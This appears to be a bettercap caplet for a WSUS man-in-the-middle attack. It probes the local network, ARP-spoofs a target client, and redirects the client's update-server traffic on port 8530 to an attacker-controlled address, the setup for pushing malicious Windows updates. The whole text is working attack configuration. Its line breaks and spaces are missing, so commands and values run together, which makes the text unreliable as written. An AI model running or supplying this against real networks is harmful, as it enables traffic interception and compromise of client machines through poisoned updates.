# Quick recon of the networknet.probeon# Set the ARP spoofingsetarp.spoof.targets $CLIENT_IPsetarp.spoof.internalfalsesetarp.spoof.fullduplexfalse# Re-route traffic aimed at the WSUS serversetany.proxy.iface $INTERFACEsetany.proxy.protocolTCPsetany.proxy.src_address $WSUS_SERVER_IPsetany.proxy.src_port8530setany.proxy.dst_address $ATTACKER_IPsetany.proxy.dst_port8530# Control logging and verbosityevents.ignoreendpointevents.ignorenet.sniff# Start the modulesany.proxyonarp.spoofonnet.sniffon